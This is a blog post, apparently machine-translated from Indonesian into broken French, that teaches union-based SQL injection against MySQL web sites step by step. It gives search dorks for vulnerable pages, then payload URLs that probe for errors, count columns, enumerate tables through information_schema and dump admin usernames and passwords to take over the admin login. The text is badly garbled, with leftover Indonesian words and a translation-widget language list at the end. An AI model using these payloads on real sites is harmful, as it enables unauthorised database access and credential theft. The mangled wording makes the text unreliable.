Apprendre SQL Injection compréhension sql injection: SQL injection est un acte de piratage qui est fait dans l'application cliente comment modifier la commande SQL qui est dans la mémoire clientèle des techniques d'application et d'exploiter une application Web qui utilise la base de données pour le stockage de données. ================================================== ================================================== ========================= ================================================== ================================================== ========================= Ce besoin d'être dans le savoir avant l'mysql sql injection: caractères: ', -commentaires: /*,-INFORMATION_SCHEMA de version: mysql version 5.x, pas pour la version de mysql 4.x allinurl: news.php? newsid = ============ One step =: = ============ rechercher clinique pajak.com par exemple: [site] / berita.php? id = 100 Ajouter le caractère 'à la fin de l'url, ou ajouter le caractère "-" pour voir s'il ya des messages d'erreur. exemple: [site] / berita.php? id = 100 'ou [site] / berita.php? id =- 100 =========== Two step =: = =========== trouver et de compter le nombre de la table existante dans la base de données ... utilisez la commande: commande par exemple: [site] / berita.php? id =- 100 + + afin de +1- - ou [site] / berita.php? id =- 100 + commande + par 1 / * ceklah étape par étape ... par exemple: [site] / berita.php? id =[site] / berita.php? id =- 100 + + afin [site] / berita.php? id =- 100 + + afin [site] / berita.php? id =- 100 + + afin 100 + + afin de +1- -de +2- -de +3- -de +4- --
il apparaît une erreur ou message d'erreur ... manquantes par exemple: [site] / berita.php? id =- 100 + + afin de +9- --
�signifie que nous prenons est au numéro 8 un [site] / berita.php? id =- 100 + + afin de +8- --
============ Trois step =: = ============ comment faire pour supprimer les numéros qui apparaissent utiliser l'union plus tôt en raison de l'erreur numéro 9 puis: [site] / berita.php? id =- 100 + union + select +1,2,3,4,5,6,7,8 -ok seumpama la sortie numéro 5 utiliser la version () ou @ @ version pour vérifier la version de sql diapakai faire les entrées sur la page avant de nagka par exemple: [site] / berita.php? id =- 100 + union + select +1,2,3,4, version (), 6,7,8 - ou [site] / berita.php? id =- 100 + union + select +1,2,3,4, @ @ version, 6,7,8 -voir la version que j'ai utilisé pour quitter seumpama version 4, car il est en version 4, il faut posséder le tableau n colonne vous avez le web, car il ne peut pas utiliser les + de INFORMATION_SCHEMA .. pour la version 5, vous êtes chanceux de ne pas besoin de la colonne de table en tant que n ver ver 4 pour 5 en ce qui peut l'utiliser de + INFORMATION_SCHEMA .. ============= Four step =: = ============= pour afficher un tableau sur la page web est en vigueur table_name commande>>> inscrit sur les chiffres ne sortent plus tôt + + Commande de INFORMATION_SCHEMA.TABLES / *>>> après avoir entré le dernier chiffre [site] / berita.php? id =- 100 + union + select +1,2,3,4, table_name, 6,7,8 + de + INFORMATION_SCHEMA.TABLES--seumpama tableau qui apparaît est "admin" ============ Cinq step =: = ============ pour afficher tout le contenu de la page tableau est
�GROUP_CONCAT commande (table_name)>>> inscrit sur les chiffres ne sortent plus tôt INFORMATION_SCHEMA.TABLES de commande + + + + où TABLE_SCHEMA = ()>>> la base de données après avoir entré le dernier chiffre [site] / berita.php? id =- 100 + union + select +1,2,3,4, GROUP_CONCAT (table_name), 6,7,8 + de + + + où INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = base de données () -- --
============== Six step =: = ============== GROUP_CONCAT commande (column_name)>>> inscrit sur les chiffres ne sortent plus tôt + + Commande de information_schema.columns où table_name + + = 0xhexa >>> après avoir entré le dernier chiffre [site] / berita.php? id =- 100 + union + select +1,2,3,4, GROUP_CONCAT (column_name), 6,7,8 + de + + + information_schema.columns où table_name = 0xhexa -à ce stade, vous devez mengextrak mot sur le contenu d'une table d'une façon qui est de convertir en hexadécimal J'ai utilisé le site pour la conversion: http://piclist.com/techref/ascii.htm http://www.industrialtrainer.com/Unicode.shtm http://www.dolcevie.com/js/converter.html http://centricle.com/tools/ascii-hex/ [et autres] Télécharger le programme ou exemple dans le mot que vous voulez à l'administrateur de la conversion sera 61646D696E [site] / berita.php? id =- 100 + union + select +1,2,3,4, GROUP_CONCAT (column_name), 6,7,8 + de + + + information_schema.columns où table_name = 0x61646D696E -============= Sept step =: = ============= créer ce qui a été exclu de la table qui est la voie concat_ws commande (0x3A, le contenu de la colonne que vous voulez enlevé)>>> inscrit sur les chiffres ne sortent plus tôt + + De la commande (dérivé de table)>>> après avoir entré le dernier chiffre
�[site] / berita.php? id =- 100 + union + select +1,2,3,4, concat_ws (0x3A, le contenu de la colonne), de 6,7,8 + + (nom dérivé de la table) -
exemple, le mot est à cet identifiant, le nom d'utilisateur, mot de passe [site] / berita.php? id =- 100 + union + select +1,2,3,4, concat_ws (0x3A, id, pseudo, mot de passe), 6,7,8 + de + admin --
=============== Huit step =: = =============== la dernière page de recherche ou login admin next up vous avez le pouvoir de l'âme entre vos mains ... Posté par Double One Was Here à 07:33 Indonesian—Detect language— AlbanianArabicBulgarianCatalanChineseCroatianCzechDanishDutchEnglishEston ianFilipinoFinnishFrenchGalicianGermanGreekHebrewHindiHungarianIndonesian ItalianJapaneseKoreanLatvianLithuanianMalteseNorwegianPersian ALPHAPolishPortugueseRomanianRussianSerbianSlovakSlovenianSpanishSwedishT haiTurkishUkrainianVietnamese > French— AlbanianArabicBulgarianCatalanChinese (Simplified)Chinese (Traditional)CroatianCzechDanishDutchEnglishEstonianFilipinoFinnishFrench GalicianGermanGreekHebrewHindiHungarianIndonesianItalianJapaneseKoreanLat vianLithuanianMalteseNorwegianPersian ALPHAPolishPortugueseRomanianRussianSerbianSlovakSlovenianSpanishSwedishT haiTurkishUkrainianVietnamese swap
�